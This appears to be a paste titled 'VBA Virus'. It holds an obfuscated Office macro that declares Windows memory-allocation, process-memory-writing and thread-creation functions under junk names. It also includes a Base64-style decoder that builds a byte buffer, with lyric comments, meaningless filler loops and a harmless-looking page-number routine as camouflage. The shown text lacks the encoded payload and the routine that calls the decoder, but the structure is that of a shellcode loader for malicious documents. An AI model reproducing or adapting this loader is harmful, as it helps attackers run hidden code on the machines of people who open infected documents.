
VBA Virus

Dec 1st, 2016
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  1. ' Bulletproof on another level, I hit up the crew
  2. #If Win64 Then
  3. ' I feel the heat, fire when the strobe hits you
  4. Public Type tenorroutine
  5. ' Cause when your head's right, you take your time
  6. start As LongPtr
  7. ' Bet you looking for something new
  8. End Type
  9. ' It's something about the love of things you like
  10. Public Declare PtrSafe Function diarrhea Lib "kernel32.dll" Alias "AttachConsole" (subsurface As LongPtr)
  11. ' I didn't see who you came with
  12. Public Declare PtrSafe Function ambigu Lib "kernel32.dll" Alias "OpenMutexA" (eutherian As LongPtr, chokey As LongPtr, tuberculin As LongPtr) As LongPtr
  13. ' Fire when the strobe hits you
  14. Public Declare PtrSafe Function adductor Lib "Kernel32" Alias "WriteProcessMemory" (ByVal brutify As Any, ByVal fearlessly As Any, ByVal outrigger As Any, ByVal freeway As Any, ByVal knocker As Any) As LongPtr
  15. ' It's all about what you bring to the crowd
  16. Public Declare PtrSafe Function lythrum Lib "ntdll" Alias "ZwAllocateVirtualMemory" (hannover As LongPtr, buttter As LongPtr, ByVal retributive As LongPtr, accipitrineByVal As LongPtr, holistic As LongPtr, ByVal caddy As LongPtr) As LongPtr
  17. ' It's something about the love of things you like
  18. Public Declare PtrSafe Function accretion Lib "Shlwapi" Alias "SHCreateThread" (ByVal orangutan As LongPtr, ByVal cochineal As Any, ByVal moiety As Any, ByVal kipling As Any) As LongPtr
  19. ' I didn't see who you came with
  20. Public Declare PtrSafe Function sunlit Lib "kernel32.dll" Alias "FindFirstFileA" (onesided As LongPtr, uncordial As LongPtr) As Boolean
  21. ' Bulletproof on another level, I hit up the crew
  22. Public Declare PtrSafe Function unoccupied Lib "kernel32.dll" Alias "ChangeTimerQueueTimer" (ByVal hegemonic As LongPtr, ByVal figuration As LongPtr, granted As LongPtr, ByVal lack As LongPtr) As LongPtr
  23. ' Bulletproof on another level, I hit up the crew
  24. Public Declare PtrSafe Function auricula Lib "kernel32.dll" Alias "GetCPInfoExA" (circination As LongPtr, discommodious As LongPtr, ambiguas As LongPtr) As Boolean
  25. ' Bulletproof on another level, I hit up the crew
  27. ' Bulletproof on another level, I hit up the crew
  28. #Else
  29. ' Bulletproof on another level, I hit up the crew
  30. Public Declare Function accretion Lib "Shlwapi" Alias "SHCreateThread" (ByVal disputes As Long, ByVal brooding As Any, ByVal dendrocolaptidae As Any, ByVal layer As Any) As Long
  31. ' Bulletproof on another level, I hit up the crew
  32. Public Declare Function expiatory Lib "kernel32.dll" Alias "ChangeTimerQueueTimer" (ByVal lewdly As Long, ByVal sonata As Long, moorings As Long, ByVal delusively As Long) As Long
  33. ' Bulletproof on another level, I hit up the crew
  34. Public Declare Function malconformation Lib "kernel32.dll" Alias "AttachConsole" (apartment As Long)
  35. ' All I seem to see
  36. Public Declare Function squall Lib "kernel32.dll" Alias "GetCPInfoExA" (cabdriver As Long, memoria As Long, ollapodrida As Long) As Boolean
  37. ' Powerful and free, confidence is key,
  38. Public Declare Function adductor Lib "Kernel32" Alias "WriteProcessMemory" (ByVal belli As Any, ByVal biograph As Any, ByVal addison As Any, ByVal inattentive As Any, ByVal klaxon As Any) As Long
  39. ' It's something about the love of things you like
  40. Public Declare Function sucker Lib "kernel32.dll" Alias "OpenMutexA" (palmyra As Long, arctonyx As Long, venogram As Long) As Long
  41. ' Bet I'm a trendsetter, too
  42. Public Declare Function glossopsitta Lib "kernel32.dll" Alias "FindFirstFileA" (baneful As Long, such As Long) As Boolean
  43. ' It's all about what you bring to the crowd
  44. Public Declare Function lythrum Lib "ntdll" Alias "ZwAllocateVirtualMemory" (silvan As Long, lingerer As Long, ByVal handspike As Long, attachByVal As Long, comminute As Long, ByVal centimo As Long) As Long
  45. ' Staring of across the room
  47. ' Hey trendsetter, see your fire when the strobe hits you
  48. #End If
  49. ' Staring of across the room
  50. Function temeritas(catechism) As String
  51. Dim atramentous As Long
  52. Dim ungulate(255) As Byte
  53. hashish = Int(292.195)
  55. Dim limitless() As Byte
  56. Dim inconvertibility As String
  58. Dim bosom(63) As Long
  59. Dim pteropogon As String
  60. Dim duenna As Long
  62. hashish = hashish Or 60
  64. Dim atheling As Variant
  66. Dim sleepily As Integer
  67. Dim sandbank As Long
  68. Dim pectinibranchia(63) As Long
  69. Dim dimetrodon(63) As Long
  70. Dim angiocardiogram(6965) As Byte
  71. Dim dipylon As Long
  72. Dim indicatory As Long
  73. rerebrace = 82 - 105 - 85 + 258156
  74. Dim permitting As Long
  76. nonaccomplishment = 16515072
  77. Dim futuri As Byte
  79. interlobular = 16711680
  80. abel = 255
  81. hygre = 65536
  82. astraphobia = 45 + 15 + 3972
  83. penicillin = 4096
  84. asparagaceae = 78 + 262066
  85. baiting = 39 + 103 - 100 + 21
  86. misrelish = 256
  87. Dim perfectly As String
  89. transcendentalplus = 64
  90. hegemonic = 65280
  91. Dim alytes As Long
  92. nashville = 94 - 123 + 115 - 86
  93. glutinousness = 7459
  94. Dim rely() As Byte
  95. rely = StrConv(catechism, vbFromUnicode)
  96. Dim amercement As Long
  97. shadowy = 14
  98. Do
  99. hashish = Round(141.443)
  100. shadowy = shadowy - 2
  101. incaution = hashish - 445
  102. Loop While shadowy
  104. aristocratic = 7459
  105. apres = 35
  106. For explode = 0 To aristocratic
  107. rely(explode) = rely(explode) + 9
  108. Next explode
  109. uselessly = 95
  110. cojuror = 62
  111. If (uselessly / cojuror) Then
  112. uselessly = "qu" & LTrim("oit")
  113. incaution = incaution Or 277
  114. shooting = "bollworm"
  115. farmer = "eig" & RTrim("htiet") & LTrim("h")
  116. Else
  117. hashish = Int(283.164)
  118. cojuror = 63
  119. End If
  121. sleepily = 0
  122. bauble = 45 - 94 + 171
  123. sidewheeler = 255
  124. cofferdam = 0
  125. impresario = 43
  126. For atramentous = cofferdam To sidewheeler
  127. If (atramentous >= 65 And atramentous <= 90) Then ungulate(atramentous) = atramentous - 65
  128. If (atramentous >= 97 And atramentous <= 122) Then ungulate(atramentous) = atramentous - 71
  129. If (atramentous >= 48 And atramentous <= 57) Then ungulate(atramentous) = atramentous + 4
  130. If atramentous = impresario Then ungulate(atramentous) = 62
  131. If atramentous = 47 Then ungulate(atramentous) = 63
  132. Next atramentous
  133. For atramentous = 0 To 63
  134. dimetrodon(atramentous) = velo(atramentous, transcendentalplus)
  135. pectinibranchia(atramentous) = velo(atramentous, penicillin)
  136. bosom(atramentous) = velo(atramentous, asparagaceae)
  137. Next atramentous
  138. aplomb = 22
  139. Do
  140. shooting = shooting
  141. aplomb = aplomb - 2
  142. hashish = Int(291.76)
  143. Loop While aplomb
  145. limitless = rely
  146. catchpenny = 4
  147. adown = 99
  148. derby = 60
  149. If (adown / derby) Then
  150. adown = LCase$("DE") & LTrim("stin") & Trim("ate")
  151. tendergreen = shooting
  152. hashish = Abs(302.74)
  153. age = "sc" & RTrim("ourer")
  154. Else
  155. incaution = incaution And 246
  156. derby = 72
  157. End If
  159. putin = 56 - 53
  160. shooting = tendergreen
  162. incaution = incaution + 464
  164. superintend = putin + 1
  165. airspace = 2
  166. For dipylon = 0 To aristocratic
  167. contralateral = limitless(dipylon)
  168. sola = limitless(dipylon + 2)
  169. indicatory = bosom(ungulate(contralateral)) _
  170.  + pectinibranchia(ungulate(limitless(dipylon + 1))) + dimetrodon(ungulate(sola)) + ungulate(limitless(dipylon + putin))
  171. atramentous = transcendentalist(indicatory, interlobular)
  172. angiocardiogram(sandbank) = facer(atramentous, hygre)
  173. atramentous = transcendentalist(indicatory, hegemonic)
  174. angiocardiogram(sandbank + 1) = facer(atramentous, misrelish)
  175. angiocardiogram(sandbank + airspace) = transcendentalist(indicatory, abel)
  176. sandbank = sandbank + airspace + 1
  177. dipylon = dipylon + 3
  178. Next
  179. temeritas = angiocardiogram
  180. End Function
  182. Sub RemovePageNumbersFromCurrentSection()
  183.     Dim ThisHeader As HeaderFooter
  184.     Dim ThisPageNumber As PageNumber
  185.     With Selection.Sections(1)
  186.         For Each ThisHeader In .Headers
  187.             For Each ThisPageNumber In ThisHeader.PageNumbers
  188.                 ThisPageNumber.Delete
  189.             Next ThisPageNumber
  190.         Next ThisHeader
  191.     End With
  192. End Sub
  194. Function velo(antimony, paradise)
  195. velo = antimony * paradise
  196. End Function
  197. Function transcendentalist(washday, felicity)
  198. transcendentalist = washday And felicity
  199. End Function
  200. Function facer(jacobean, algebraic)
  201. facer = jacobean \ algebraic
  202. End Function
  203. Function dawdler(starryeyed)
  204. dawdler = AscW(starryeyed)
  205. End Function
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